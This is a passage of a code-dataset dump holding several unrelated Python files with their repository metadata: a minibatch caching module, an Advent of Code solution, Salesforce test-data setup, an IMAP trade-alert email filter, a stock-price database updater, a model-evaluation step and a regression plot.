Minibatch persistency and Data Echoing\n\n\t\t\tyield indices \t#GENERATOR\n#end.. class Bagging\t\t\t\n\ndef verify2result(myresults1, myresults2):\n\tr1 = sorted(myresults1, key=lambda e: e.index)\t\n\tr2 = sorted(myresults2, key=lambda e: e.index)\t\n\n\tverified = True\n\tfor i in range(len(r1)):\n\t\titem01 = r1[i]\n\t\titem02 = r2[i]\n\t\t#1: compare our indices\n\t\tif item01.index != item02.index:\n\t\t\tverified = False\n\t\tdata1 = item01.data\n\t\tdata2 = item02.data\n\t\t#2: compare our ndarrays(images)\n\t\tif np.array_equal(data1.coeffs, data2.coeffs) == False:\n\t\t\tprint(f\"[{i}]: {data1.coeffs}, {data2.coeffs}\")\n\t\t\tverified = False\n\t\t#3: compare our labels\n\t\tif data1.label != data2.label:\n\t\t\tverified = False\n\n\tassert(verified)\n\treturn verified\n\n#\n# asyncio: https://docs.python.org/3/library/asyncio-task.html#task-object\n#\nGetDesc = namedtuple(\"GetDesc\", \"index data\")\n\nasync def get1(dataset, index):\n\treturn GetDesc(index, dataset[index])\n\nasync def getBatch(dataset, indices, logging=False):\n\tbatchsize = len(indices)\n\timglist = []\t#for collecting the results from async complete callback\n\tlabellist = []\n\t\n\tdef oneDone(task):\n\t\t#https://stackoverflow.com/questions/44345139/python-asyncio-add-done-callback-with-async-def\n\t\tmyresult = task.result()\n\t\timglist.append(myresult.data.coeffs)\n\t\tlabellist.append(np.int64(myresult.data.label))\t# Torch seems to want labels as torch.long which is int64\n\n\t#1: sort indices to get a sequential access order - optimize IO\n\tbatch = np.sort(indices)\n\n\tif (logging):\n\t\tprint(f\"batch = {batch}\")\n\n\ttasks = []\n\t#1: issue concurrent load for the whole batch\n\tfor i in batch:\n\t\tt = asyncio.create_task(get1(dataset, i))\n\t\tt.add_done_callback(oneDone)\n\t\ttasks.append(t)\n\n\t#2: parallel wait on all concurrent tasks\t\n \t#https://stackoverflow.com/questions/42231161/asyncio-gather-vs-asyncio-wait\n\tdone, pending = await asyncio.wait(tasks)\t#, return_when=asyncio.FIRST_COMPLETED\n\tassert(len(pending) == 0)\n\n\t#optionally retrieve each result direct from the tasks to verify add_done_callback()\n\tif kVerifyResults:\n\t\tmyresults2 = [task.result() for task in done]\n\t\tverify2result(myresults, myresults2)\n\n\t#TODO: change get1() to directly output to a ndarray\n\treturn np.asarray(imglist), np.asarray(labellist)\n\ndef getBatchAsync(dbchunk, batch, logging=False):\n\t\"\"\" get 'batch' which is an array of indices \n\t\tRet: ndarray((batchsize, width, height), dtype=float32)\n\t\"\"\"\n\tresults = asyncio.run(getBatch(dbchunk, batch, logging))\n\treturn results\n\n#\n# Unit test routines:\n#\nfrom shnetutil.pipeline import loadMNIST\n\ndef test_epochgen(mnist_train, bsize):\n\t\"\"\" use .epoch() generator on the BatchBuilder \"\"\"\n\ttrainbatchbuilder = Bagging(mnist_train, bsize)\n\tlabels1 = []\n\tfor i in range(epochs):\n\t\tlabelcnt = Counter()\n\t\ttrainiter = trainbatchbuilder.epoch(False)\n\t\t#trainiter = iter(train_loader)\n\t\tfor b, mybatch in enumerate(trainiter):\n\t\t\t#'mybatch' is an array of indices defining the minibatch samples\n\t\t\t#print(mybatch[10:])\n\t\t\timages, labels = getBatchAsync(mnist_train, mybatch)\n\t\t\t#images, label = batch_\n\t\t\tprint(f\"[{i,b}]{mybatch.shape}, {images.shape}\")\n\t\t\tlabelcnt.update(labels)\n\t\t\tlabels1.append(labels)\n\t\tprint(labelcnt)\t\n\treturn labels1\n\t\t\ndef test_selfIter(mnist_train, bsize):\n\t\"\"\" use iter() on the BatchBuilder itself \"\"\"\n\ttrainbatchbuilder = Bagging(mnist_train, bsize)\n\tlabels2 = []\n\tfor i in range(epochs):\n\t\ttrainiter = iter(trainbatchbuilder)\n\t\tlabelcnt = Counter()\n\n\t\tfor b, mybatch in enumerate(trainiter):\n\t\t\timages, labels = mybatch\n\t\t\tprint(f\"[{i,b}]{type(mybatch)}, {images.shape}\")\n\t\t\tlabelcnt.update(labels)\n\t\t\tlabels2.append(labels)\n\t\tprint(labelcnt)\n\treturn labels2\t\n\ndef test_iterObj(mnist_train, bsize):\n\t\"\"\" standalone iterator .BatchIterator \"\"\"\n\ttrainbatchbuilder = Bagging(mnist_train, bsize)\n\ttrain_loader = BatchIterator(trainbatchbuilder)\n\n\tlabels1 = []\n\tfor i in range(epochs):\n\t\tlabelcnt = Counter()\n\n\t\tfor b, mybatch in enumerate(train_loader):\n\t\t\timages, labels = mybatch\n\t\t\tprint(f\"[{i,b}]{type(mybatch)}, {images.shape}\")\n\t\t\tlabelcnt.update(labels)\n\t\t\tlabels1.append(labels)\n\t\tprint(labelcnt)\t\n\treturn labels1\n#\n# BatchCache:\n#\nclass BatchCache(BatchBuilderBase):\n\tdef __init__(\n\t\tself,\n\t\tbatchsize:int,\n\t\tbatchbuilder: BatchBuilderBase,\n\t\txform = None,\n\t):\t\n\t\tassert((batchbuilder == None) or (not batchbuilder.shuffle))\n\t\tself.batchsize = batchsize\n\t\tself.batchbuilder = batchbuilder\n\t\t#self.dataset = batchbuilder.dataset\n\t\tself.xform = xform\n\t\tself.capture = True\n\t\tself.reset()\n\n\tdef __len__(self):\n\t\treturn len(self.cache)\n\t\t#return len(self.batchbuilder)\n\n\tdef __getitem__(self, index:int):\n\t\t\"\"\" index cached batches \"\"\"\n\t\treturn self.cache[index]\n\n\tdef __deepcopy__(self, memo):\n\t\t#print(f\"BatchCache.__deepcopy__\")\n\t\treturn self\n\n\tdef getitem(self, index:int):\n\t\t\"\"\" Treating all batches as a 1-d array of self.size \"\"\"\n\t\tb, offset = divmod(index, self.batchsize)\n\t\treturn self.cache[b][offset]\t\t\n\n\tdef reset(self):\n\t\tself.cache = []\n\t\tself.size = 0\n\n\tdef setcapture(self, enable:bool):\n\t\tself.capture = enable\t\n\n\tdef finalize(self):\n\t\t\"\"\" Finished first epoch, caching is done \"\"\"\n\t\tself.setcapture(False) \t#next epoch will be replay of capture\n\t\tprint(f\"BatchCache.finalize={self.size}\")\n\t\t#torch.save(self.cache, \"batchcacheX\")\t#1.52gb for 10k test\n\n\tdef rand_indices(self, num):\t\n\t\tpass\n\n\tdef insert(self, batchdata: tuple):\n\t\tshape = batchdata.shape\n\t\tself.size += shape[0] \t\t#size of batch\n\t\t#print(f\"insert {shape}\")\n\t\tself.cache.append(batchdata.detach().cpu())\n\n\tdef loadcache(self, kLogging=False):\n\t\ttic1 = time.time()\n\t\tbatchbuilder = self.batchbuilder\n\t\tepoch = batchbuilder.epoch(False)\n\n\t\tfor b, mybatch in enumerate(epoch):\n\t\t\timglist, labels = getBatchAsync(batchbuilder.dataset, mybatch)\n\t\t\timglist = self.xform(np.asarray(imglist))\n\t\t\tself.insert(imglist)\n\t\tif kLogging:\n\t\t\ttime_spent(tic1, f\"loadcache\", count=1)\t#5.61/e,\n\t\t\n\tdef epoch(self, kLogging=False):\n\t\tif self.capture:\n\t\t\tself.loadcache(kLogging=kLogging)\n\t\tfor batch in self.cache:\n\t\t\tyield batch\n#end of BatchCache\t\t\t\n\nclass CachedDataset(dataset_base.DataSet):\n\t\"\"\" An adaptor for BatchCache to make it into a DataSet \"\"\"\n\tdef __init__(self, batchcache: BatchCache, colorspace = \"grayscale\"):\n\t\tassert(issubclass(type(batchcache), BatchCache))\n\t\tsuper().__init__(\"cachedDataset\", colorspace)\n\t\tself.batchcache = batchcache\n\t\tself.batchsize = batchcache.batchsize\n\t\tself.cached = batchcache.cache\n\n\t\t#1: verify the total count of all cached batches\n\t\tcount = 0\n\t\tfor batch in self.cached:\n\t\t\tshape = batch.shape\n\t\t\tcount += shape[0]\n\t\tassert(count == batchcache.size)\t\n\t\tself.size = count\n\t\tself.getter = self.doubleIndexGetter\n\t\tself.finalized = False\n\n\tdef finalize(self):\n\t\tself.finalized = True\n\t\tself.cached = cplx.cat(self.cached, dim = 0)\n\t\tself.getter = self.singleIndexGetter\n\t\treturn\n\n\tdef __getitem__(self, index:int):\n\t\treturn self.getter(index)\n\t\t\n\tdef doubleIndexGetter(self, index: int):\n\t\tb, offset = divmod(index, self.batchsize)\n\t\treturn self.cached[b][offset]\n\n\tdef singleIndexGetter(self, index: int):\n\t\treturn self.cached[index]\n\n\tdef __len__(self):\n\t\treturn self.size\n#end of CachedDataset\n\ndef verifyBatchCache(batchbuilder, xform):\n\tdbchunk = batchbuilder.dataset\n\tbatchcache = BatchCache(batchbuilder, xform)\n\tbatchcache.loadcache(True)\n\n\tepoch = batchbuilder.epoch()\n\n\ttic2 = time.time()\n\tfor b, mybatch in enumerate(epoch):\n\t\timglist, labels = getBatchAsync(dbchunk, mybatch)\n\t\timglist = xform(np.asarray(imglist))\n\t\t#print(f\"b[{b}] {len(imglist)}, {type(imglist)}, {type(batchcache.cache[b][0])}\")\n\t\t#print(f\"b[{b}] {len(labels)}, {type(labels)}, {type(batchcache.cache[b][1])}\")\n\t\tif b == 0:\n\t\t\t#print(labels, batchcache.cache[b][1])\n\t\t\timg00 = imglist[0,:,:]\n\t\t\timg10 = batchcache.cache[b][0][0,:,:]\n\t\t\tprint(f\"imglist[0,:,:].shape {img00.shape}, batchcache.cache[b][0][0,:,:].shape {img10.shape}\")\n\t\t\t#print(img00[:1].real, img10[:1].real)\n\t\t#assert(np.array_equal(batchcache.cache[b][1], labels))\n\t\tassert(np.array_equal(batchcache.cache[b].numpy(), imglist.numpy()))\n\ttime_spent(tic2, f\"verify xform\", count=1)\t#5.61/e\n\n\nif __name__ == '__main__':\n\tfashiondir = projconfig.getFashionMNISTFolder()\n\n\t#dataset = MNIST('mnist', train=True, download=True, transform=MNIST_TRANSFORM)\n\tmnist_train = loadMNIST.getdb(fashiondir, istrain=False, kTensor = False)\n\tprint(f\"mnist_train {len(mnist_train)} from {fashiondir}\")\n\n\tbsize = 1000\n\tepochs = 2\n\n\t#1: use .epoch() generator interface\n\tlabels1 = test_epochgen(mnist_train, bsize)\n\n\t#2: use iter() on the BatchBuilder itself\n\tlabels2 = test_selfIter(mnist_train, bsize)\n\n\t#2: use standalone iterator\n\tlabels3 = test_iterObj(mnist_train, bsize)\n\n\tfor i in range(len(labels1)):\n\t\tl1 = labels1[i]\n\t\tl2 = labels2[i]\n\t\tl3 = labels3[i]\n\t\tassert(np.equal(l1, l2).all())\n\t\tassert(np.equal(l1, l3).all())\n\tprint(f\"passed assert(np.equal(l1, l2).all())\")\t\n\tprint(f\"passed assert(np.equal(l1, l3).all())\")\t\n\t\t","repo_name":"Ujjawal-K-Panchal/coshnet","sub_path":"libs/shnetutil/shnetutil/pipeline/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":15555,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"54"} +{"seq_id":"7269885041","text":"import os\nfrom requests import get\n\nurl = 'http://www.ntma.ie/download/dail_bonds_outstanding_reports/OutstandingBondsreport-2017-11-02.pdf'\n\nf1 = os.stat('1.pdf').st_mtime\nf2 = os.stat('2.pdf').st_mtime\n\nif f1 > f2:\n print(f1)\n print(f2)\n with open('2.pdf', 'wb') as f:\n f.write(get(url).content)\nif f1 < f2:\n print(\"f2\")\n with open('1.pdf', 'wb') as f:\n f.write(get(url).content)\n","repo_name":"rzegnam/first_script_ever","sub_path":"ready_scripts/modication_time.py","file_name":"modication_time.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"20271090823","text":"import re\nfrom datetime import datetime\nfrom collections import Counter, defaultdict\nfrom aoc.util.load_input import load_input, build_filename\n\n\ndef parse_line(line):\n # (date), (desc (guard) (wakes up) (falls asleep))\n pattern = r\"\\[(.*)\\] (Guard #(\\d+) begins shift|(wakes up)|(falls asleep))\"\n res = re.match(pattern, line)\n date, _, guard, wakes_up, falls_asleep = res.groups()\n\n datetime_format = \"%Y-%m-%d %H:%M\"\n date = datetime.strptime(date, datetime_format)\n if guard:\n guard = int(guard)\n return (date, guard, wakes_up, falls_asleep)\n\n\ndef get_input_from_file(name, parse=True, sort_by_date=True):\n input = load_input(build_filename(__file__, name), typ=str)\n\n if parse:\n input = [parse_line(l) for l in input]\n if sort_by_date:\n input.sort(key=lambda x: x[0])\n else:\n assert not sort_by_date, \"can only sort if parsing\"\n\n return input\n\n\ndef solve_day4_part1(entries):\n minute_tracker = defaultdict(Counter)\n current_guard = None\n current_guard_fell_asleep = None\n most_minutes_slept = 0\n guard_who_slept_most = None\n for date, guard, wakes_up, falls_asleep in entries:\n if guard:\n current_guard = guard\n current_guard_minutes_slept = 0\n elif falls_asleep:\n current_guard_fell_asleep = date\n elif wakes_up:\n for minute in range(current_guard_fell_asleep.minute, date.minute):\n minute_tracker[current_guard][minute] += 1\n minutes_asleep = date.minute - current_guard_fell_asleep.minute\n current_guard_minutes_slept += minutes_asleep\n if current_guard_minutes_slept > most_minutes_slept:\n most_minutes_slept = current_guard_minutes_slept\n guard_who_slept_most = current_guard\n \n\n minutes = minute_tracker[guard_who_slept_most]\n minute, _ = minutes.most_common(1)[0]\n\n return minute * guard_who_slept_most\n\nif __name__ == \"__main__\":\n test_input_raw = get_input_from_file(\"test_input\", parse=False, sort_by_date=False)\n test_input = get_input_from_file(\"test_input\", parse=True)\n\n events = get_input_from_file(\"input\", parse = True)\n answer = solve_day4_part1(events)\n print(\"Day 4 Part 1 answer: The product of guard x minutes slept is {}\".format(answer))\n\n","repo_name":"wconstab/algo","sub_path":"aoc/day4/solve_day4.py","file_name":"solve_day4.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72245389601","text":"import logging\n\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom faker import Faker\n\nimport sfdc\n\nfake = Faker()\n\ndef setup_test_records():\n aid = create_account()\n\n if not aid:\n logging.warning('Account cound not be created. Halting.')\n return\n\n cid = create_contact(aid)\n\n if not cid:\n logging.warning('Contact cound not be created. Halting.')\n rollback(aid)\n return\n\n oid = create_opportunity(aid, cid)\n\n if not oid:\n logging.warning('Opportunity could not be created. Halting.')\n rollback(aid, cid)\n return\n\n logging.info('Done!')\n\n\ndef rollback(account_id: str, contact_id: str=''):\n logging.info('Rolling back inserted records...')\n\n if contact_id:\n sfdc.sfdc_client.inner_client.Contact.delete(contact_id)\n\n sfdc.sfdc_client.inner_client.Account.delete(account_id)\n\ndef create_opportunity(account_id: str, contact_id: str):\n oid = ''\n close_date_str = datetime.now().isoformat().split('T')[0]\n contract_end_date_str = (datetime.now() + relativedelta(years=1, days=-1)).isoformat().split('T')[0]\n\n opp_payload = {\n 'Name': f'Test Opp {datetime.now().isoformat()}',\n 'RecordTypeId': '0123g000000PP5Q',\n 'AccountId': account_id,\n 'Type': 'New Subscription',\n 'StageName': '3. Preparing for Trial Check-In',\n 'CloseDate': close_date_str,\n 'Decision_Maker__c': contact_id,\n 'Contract_Start_Date__c': close_date_str,\n 'Contract_End_Date__c': contract_end_date_str\n }\n\n logging.info('Creating Opportunity...')\n result = sfdc.sfdc_client.inner_client.Opportunity.create(opp_payload)\n\n if result['success']:\n oid = result['id']\n logging.info(f\"Opportunity Id: {oid}\")\n else:\n for err in result['errors']:\n logging.error(err)\n\n return oid\n\ndef create_contact(account_id: str):\n cid = ''\n first_name = fake.first_name()\n last_name = fake.last_name()\n email = fake.ascii_company_email()\n\n contact_payload = {\n 'AccountId': account_id,\n 'FirstName': first_name,\n 'LastName': last_name,\n 'Email': email,\n 'Type__c': 'Other',\n 'LeadSource': 'Other',\n 'Status_of_User__c': 'Inactive'\n }\n\n logging.info('Creating Contact...')\n result = sfdc.sfdc_client.inner_client.Contact.create(contact_payload)\n\n if result['success']:\n cid = result['id']\n logging.info(f\"Contact Id: {cid}\")\n else:\n for err in result['errors']:\n logging.error(err)\n\n return cid\n\n\ndef create_account():\n aid = ''\n company_name = fake.company()\n\n account_payload = {\n 'Name': f\"OPRD - {company_name}\",\n 'Type': 'AlphaSense Internal'\n }\n\n logging.info('Creating Account...')\n result = sfdc.sfdc_client.inner_client.Account.create(account_payload)\n\n\n if result['success']:\n aid = result['id']\n logging.info(f\"Account Id: {aid}\")\n else:\n for err in result['errors']:\n logging.error(err)\n\n\n\n return aid","repo_name":"KevinJMcGrath/OPRD_Utility","sub_path":"sfdc/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30804391073","text":"import imaplib\r\nimport email\r\nimport os\r\n\r\n\r\nmail = imaplib.IMAP4_SSL('imap.gmail.com')\r\nmail.login('a0916295361@gmail.com', 'your_app_password')\r\n\r\n\r\n\r\nmail.select(\"inbox\")\r\n\r\n# 搜尋條件\r\nsearch_criteria = 'UNSEEN OR SUBJECT \"BOUGHT\" SUBJECT \"SOLD\"'\r\n\r\n# 搜尋符合條件的郵件\r\nresult, data = mail.search(None, search_criteria)\r\n\r\n# 檢查郵件主題\r\nfor num in data[0].split():\r\n typ, msg_data = mail.fetch(num, '(RFC822)')\r\n email_message = email.message_from_bytes(msg_data[0][1])\r\n subject = email_message['subject']\r\n \r\n if len(subject) < 43:\r\n \r\n with open(os.path.join(r'D:\\\\trading_terminal\\\\trade_big_data', 'email_subjects.txt'), 'a') as f:\r\n f.write(subject + '\\n')\r\n print(subject)\r\nmail.logout()\r\n\r\n\r\ndef extract_TQQQ_subjects(input_file_path, output_file_path):\r\n with open(input_file_path, 'r') as f_input, \\\r\n open(output_file_path, 'w') as f_output:\r\n \r\n for line in f_input:\r\n if 'TQQQ' in line:\r\n f_output.write(line)\r\n \r\ninput_file_path =r'D:\\trading_terminal\\trade_big_data\\email_subjects.txt'\r\noutput_file_path =r'D:\\trading_terminal\\trade_big_data\\TQQQ_subjects.txt'\r\nextract_TQQQ_subjects(input_file_path, output_file_path)\r\n\r\ndef extract_SQQQ_subjects(input_file_path, output_file_path):\r\n with open(input_file_path, 'r') as f_input, \\\r\n open(output_file_path, 'w') as f_output:\r\n \r\n for line in f_input:\r\n if 'SQQQ' in line:\r\n f_output.write(line)\r\n \r\ninput_file_path =r'D:\\\\trading_terminal\\\\trade_big_data\\\\email_subjects.txt'\r\noutput_file_path =r'D:\\\\trading_terminal\\\\trade_big_data\\\\SQQQ_subjects.txt'\r\nextract_SQQQ_subjects(input_file_path, output_file_path)\r\n\r\n\r\n\r\n","repo_name":"bensonalioth/trading_terminal","sub_path":"imap.py","file_name":"imap.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11980362870","text":"from datetime import datetime\nimport calendar\nfrom threading import Timer\nimport json\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom src.etc.utils.maria_client import get_connection\n\n\nclass DBUpdater:\n def __init__(self):\n company_ddl = \"\"\"\n CREATE TABLE IF NOT EXISTS company_info (\n code VARCHAR(20),\n company VARCHAR(40),\n last_update DATE,\n PRIMARY KEY (code)\n )\n \"\"\"\n\n daily_ddl = \"\"\"\n CREATE TABLE IF NOT EXISTS daily_price (\n code VARCHAR(20),\n date DATE,\n open BIGINT(20),\n high BIGINT(20),\n low BIGINT(20),\n close BIGINT(20),\n diff BIGINT(20),\n volume BIGINT(20),\n PRIMARY KEY (code, date)\n )\n \"\"\"\n\n self.conn = get_connection('/srv/stock/config/config.json')\n\n with self.conn.cursor() as curs:\n curs.execute(company_ddl)\n curs.execute(daily_ddl)\n\n self.conn.commit()\n self.codes = dict()\n self.update_comp_info()\n\n def __del__(self):\n self.conn.close()\n\n # 이게 클래스 안에 있을 필요는 없지\n def read_krx_code(self):\n url = \"https://dev-kind.krx.co.kr/corpgeneral/corpList.do?method=download&searchType=13\"\n krx = pd.read_html(url, header=0)[0]\n krx = krx[['종목코드', '회사명']]\n krx = krx.rename(columns={'종목코드': 'code', '회사명': 'company'})\n krx.code = krx.code.map('{:06d}'.format)\n return krx\n\n def update_comp_info(self):\n company_select_sql = \"\"\"\n SELECT *\n FROM company_info\n \"\"\"\n\n select_last_update = \"\"\"\n SELECT MAX(last_update) \n FROM company_info\n \"\"\"\n\n company_info = pd.read_sql(company_select_sql, self.conn)\n for idx in range(len(company_info)):\n self.codes[company_info['code'].values[idx]] = company_info['company'].values[idx]\n\n with self.conn.cursor() as curs:\n curs.execute(select_last_update)\n rs = curs.fetchone()\n today = datetime.today().strftime('%Y-%m-%d')\n\n if rs[0] is None or rs[0].strftime('%Y-%m-%d') < today:\n krx = self.read_krx_code()\n for idx in range(len(krx)):\n code = krx.code.values[idx]\n company = krx.company.values[idx]\n update_company_info = f\"\"\"\n REPLACE INTO company_info \n (code, company, last_update)\n VALUES\n ('{code}', '{company}', '{today}')\n \"\"\"\n curs.execute(update_company_info)\n self.codes[code] = company\n\n self.conn.commit()\n\n def read_naver(self, code, company, pages_to_fetch):\n df = None\n try:\n url = f'http://finance.naver.com/item/sise_day.nhn?code={code}'\n # anchor 에 붙어있는 href 속성을 가져와서 page 번호 string 을 취득하는 과정\n with urlopen(url) as doc:\n html = BeautifulSoup(doc, 'lxml')\n pgrr = html.find('td', class_='pgRR')\n s = str(pgrr.a['href']).split('=')\n lastpage = s[-1]\n df = pd.DataFrame()\n pages = min(int(lastpage), pages_to_fetch) # 전달받은 페이지보다 최대 페이지가 큰지 확인하는 로직\n\n for page in range(1, pages + 1):\n pg_url = f'{url}&page={page}'\n df = df.append(pd.read_html(pg_url, header=0)[0])\n df = df.rename(columns={\n '날짜': 'date',\n '시가': 'open',\n '종가': 'close',\n '고가': 'high',\n '저가': 'low',\n '전일비': 'diff',\n '거래량': 'volume'\n })\n # 수정 종가는?\n df['date'] = df['date'].replace('.', '-')\n df.dropna(inplace=True)\n df[['open', 'close', 'high', 'low', 'diff', 'volume']] = \\\n df[['open', 'close', 'high', 'low', 'diff', 'volume']].astype(int)\n df = df[['date', 'open', 'close', 'high', 'low', 'diff', 'volume']]\n except Exception as e:\n print(f'Exception occurred : {e}')\n raise e\n return df\n\n def replace_into_db(self, df, num, code, company):\n with self.conn.cursor() as curs:\n for r in df.itertuples():\n sql = f\"\"\"\n REPLACE INTO daily_price \n VALUES\n ('{code}', '{r.date}', {r.open}, {r.close}, {r.high}, {r.low}, {r.diff}, {r.volume})\n \"\"\"\n curs.execute(sql)\n self.conn.commit()\n\n def update_daily_price(self, pages_to_fetch):\n for idx, code in enumerate(self.codes):\n df = self.read_naver(code, self.codes[code], pages_to_fetch)\n if df is None:\n continue\n self.replace_into_db(df, idx, code, self.codes[code])\n\n def execute_daily(self):\n config_file = 'config.json'\n self.update_comp_info()\n try:\n with open(config_file, 'r') as in_file:\n config = json.load(in_file)\n pages_to_fetch = config['pages_to_fetch']\n except FileNotFoundError as fne:\n with open(config_file, 'w') as out_file:\n pages_to_fetch = 100\n config = {'pages_to_fetch': 1}\n json.dump(config, out_file)\n self.update_daily_price(pages_to_fetch)\n\n tmnow = datetime.now()\n lastday = calendar.monthrange(tmnow.year, tmnow.month)[1]\n year = tmnow.year\n month = tmnow.month\n day = tmnow.day\n if tmnow.month == 12 and tmnow.day == lastday: # 막달의 막일이라면\n year = tmnow.year + 1\n month = 1\n day = 1\n elif tmnow.day == lastday:\n month = tmnow.month + 1\n day = 1\n else:\n day = tmnow.day + 1\n tmnext = tmnow.replace(year=year, month=month, day=day, hour=17, minute=0, second=0)\n tmdiff = (tmnext - tmnow).seconds\n t = Timer(tmdiff, self.execute_daily)\n t.start()\n\n\nif __name__ == '__main__':\n print('DB Updater')\n updater = DBUpdater()\n updater.execute_daily()\n","repo_name":"juneyoung/stock_test","sub_path":"src/week3/Investar/DBUpdater.py","file_name":"DBUpdater.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36659805659","text":"from credit_default.entity import artifact_entity, config_entity\nfrom credit_default.exception import CustomException\nfrom credit_default.logger import logging\nfrom credit_default.utils import load_object, load_numpy_array_data\nfrom credit_default.predictor import ModelResolver\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom credit_default.config import TARGET_COLUMN\nfrom sklearn.metrics import f1_score\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import RobustScaler\n\nclass ModelEvaluation:\n def __init__(self,\n model_eval_config: config_entity.ModelEvaluationConfig,\n data_ingestion_artifact: artifact_entity.DataIngestionArtifact,\n data_transformation_artifact: artifact_entity.DataTransformationArtifact,\n model_trainer_artifact: artifact_entity.ModelTrainerArtifact):\n try:\n logging.info(f\"{'>>' * 20} Model Evaluation {'<<' * 20}\")\n self.model_eval_config = model_eval_config\n self.data_ingestion_artifact = data_ingestion_artifact\n self.data_transformation_artifact = data_transformation_artifact\n self.model_trainer_artifact = model_trainer_artifact\n self.model_resolver = ModelResolver()\n except Exception as e:\n raise CustomException(e, sys)\n\n def initiate_model_evaluation(self, test_arr: np.ndarray) -> artifact_entity.ModelEvaluationArtifact:\n try:\n logging.info(\"Checking if the saved model folder has a model and comparing the trained models\")\n latest_dir_path = self.model_resolver.get_latest_dir_path()\n if latest_dir_path is None:\n model_eval_artifact = artifact_entity.ModelEvaluationArtifact(\n is_model_accepted=True,\n improved_accuracy=None\n )\n logging.info(f\"Model evaluation artifact: {model_eval_artifact}\")\n return model_eval_artifact\n\n logging.info(\"Finding the locations of the transformer model and model\")\n transformer_path = self.model_resolver.get_latest_transformer_path()\n model_path = self.model_resolver.get_latest_model_path()\n\n logging.info(\"Loading the previously trained transformer and model\")\n transformer = load_object(file_path=transformer_path)\n model = load_object(file_path=model_path)\n\n logging.info(\"Loading the currently trained transformer and model\")\n current_transformer = load_object(file_path=self.data_transformation_artifact.transform_object_path)\n current_model = load_object(file_path=self.model_trainer_artifact.model_path)\n\n logging.info(\"Transforming the test data using the current transformer\")\n \n # Transforming the test data using the current transformer\n transformed_test_arr = current_transformer.named_steps['RobustScaler'].transform(test_arr[:, :-1])\n\n # Ensure the number of features in the test data matches the expected number\n if transformed_test_arr.shape[1] != current_transformer.named_steps['RobustScaler'].n_features_in_:\n raise ValueError(\"Number of features in the test data is not compatible with the transformer\")\n\n # Add the target column back to the transformed test data\n transformed_test_arr_with_target = np.hstack((transformed_test_arr, test_arr[:, -1].reshape(-1, 1)))\n\n logging.info(\"Calculating accuracy using the current trained model\")\n y_pred = current_model.predict(transformed_test_arr_with_target[:, :-1]) # Predict using the current model\n print(f\"Prediction using the trained model: {y_pred[:5]}\")\n current_model_score = f1_score(y_true=test_arr[:, -1], y_pred=y_pred)\n logging.info(f\"Accuracy using the current trained model: {current_model_score}\")\n\n if latest_dir_path:\n logging.info(\"Calculating accuracy using the previous trained model\")\n print(f\"Number of features in test data: {test_arr.shape[1]}\")\n print(f\"Number of features in transformed test data: {transformed_test_arr.shape[1]}\")\n \n input_arr = transformer.transform(test_arr[:, :-1]) # Exclude the target column during transformation\n y_pred = model.predict(input_arr)\n print(f\"Prediction using previous model: {y_pred[:5]}\")\n previous_model_score = f1_score(y_true=test_arr[:, -1], y_pred=y_pred)\n logging.info(f\"Accuracy using previous trained model: {previous_model_score}\")\n\n if float(current_model_score) <= float(previous_model_score):\n logging.info(\"The current trained model is not better than the previous model\")\n raise Exception(\"The current trained model is not better than the previous model\")\n\n model_eval_artifact = artifact_entity.ModelEvaluationArtifact(\n is_model_accepted=True,\n improved_accuracy=current_model_score - previous_model_score\n )\n logging.info(f\"Model evaluation artifact: {model_eval_artifact}\")\n return model_eval_artifact\n\n except Exception as e:\n raise CustomException(e, sys)\n\n","repo_name":"chetna-978/credit_default","sub_path":"credit_default/components/model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26980115039","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\nnp.random.seed(12345678)\n# x = np.random.random(10)\nx = np.array([1 + k for k in range(0, 36)])\n# y = np.random.random(10)\ny = np.array([7364, 6704, 6503, 6446, 6203, 6260, 6317, 6289, 6339, 6498, 6492, 6524, 6501, 6273, 6353, 6400, 6512, 6754, 6721, 6702, 6601, 6439, 6474, 6684, 6635, 6604, 6630, 6581, 6542, 6490, 6557, 6626, 6589, 6591, 6656, 6617])\n# slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n\nnp_array = np.polyfit(x, y, 1)\nintercept = np_array[1]\nslope = np_array[0]\ny_reg = np.array([intercept + x_value*slope for x_value in x])\ny_changed_by_reg = y - y_reg\n\nslope, intercept, r_value, p_value, std_err = stats.linregress(y, y_reg)\n\nstd_y_reg = y_reg.std()\nstd_y = y.std()\nstd_y_changed_by_reg = y_changed_by_reg.std()\n\nprint('slope={}, intercept={}, str_err={}'.format(slope, intercept, std_err))\n\nprint(\"r-squared:\", r_value**2) # r-squared: 0.08040226853902833\n# Plot the data along with the fitted line\n\nplt.plot(x, y, 'o', label='original data')\nplt.plot(x, intercept + slope*x, 'r', label='fitted line')\nplt.legend()\nplt.show()\n\n\n","repo_name":"SertlAnalytics/PycharmProjects","sub_path":"Gaming/Stocks/pattern_test/run_plot_test.py","file_name":"run_plot_test.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36260233061","text":"import json\nimport copy\n\nwith open('converter/base.json') as base_file:\n article_base = json.load(base_file)\n\n\ndef convert(json_string):\n data = json.loads(json_string)\n article = copy.deepcopy(article_base)\n try:\n 